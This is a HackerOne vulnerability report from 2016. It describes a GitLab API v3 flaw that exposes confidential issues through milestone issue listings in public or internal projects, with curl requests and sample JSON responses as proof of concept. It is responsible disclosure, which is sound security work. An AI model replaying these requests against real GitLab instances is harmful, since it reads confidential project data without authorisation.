Confidential issues leaked in public projects when attached to milestone
- Title: Confidential issues leaked in public projects when attached to milestone
- Types: Information Disclosure
- Link: https://hackerone.com/reports/134300
- Date: 2016-04-24 20:37:22 -0400
- By: jobert
Details:
Vulnerability details
When a confidential issue in a public or internal project is attached to a milestone, it is exposed through the GitLab API.
Proof of concept
As a victim, create a new public or internal project. Lets state that the project has ID 1. Create a milestone for this project. After that, create a confidential issue for this project and attach it to the milestone. In this proof of concept, we're going to extract the title and description of the confidential issue. As an attacker, start by fetching all the milestones for the project:
curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/milestones"
The command will respond with all milestones. In this example, it returns the milestone that was created by the victim:
[
{
"id":3,
"iid":1,
"project_id":1,
"title":"Milestone title",
"description":"Milestone description",
"state":"active",
"created_at":"2016-04-22T01:15:37.902Z",
"updated_at":"2016-04-22T01:15:37.902Z",
"due_date":null
}
]
For each unique milestone ID that is returned in this response, execute the following command:
curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/milestones/3/issues"
The response if this request will contain all issues, including confidential issues:
[
{
"id":13,
"iid":1,
"project_id":1,
"title":"Some confidential issue",
"description":"This is some super confidential information.",
"state":"opened",
"created_at":"2016-04-22T00:59:38.877Z",
"updated_at":"2016-04-25T00:10:16.711Z",
"labels":[],
"milestone": {
"id":3,
"iid":1,
"project_id":1,
"title":"Milestone title",
"description":"Milestone description",
"state":"active",
"created_at":"2016-04-22T01:15:37.902Z",
"updated_at":"2016-04-22T01:15:37.902Z",
"due_date":null
},
"assignee":null,
"author": {
"name":"John Doe",
"username":"john",
"id":1,
"state":"active",
"avatar_url":"http://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon",
"web_url":"http://gitlab-instance/u/john"
}
}
]
Impact
Confidential issues may contain information that shouldn't be known to the outside. An example could be security issues that are tracked in GitLab for open source projects, like gitlab-org/gitlab-ce
or gitlab-org/gitlab-ee
. It may also contain private API tokens that need to be tracked in a task (I wouldn't recommend it, but it happens).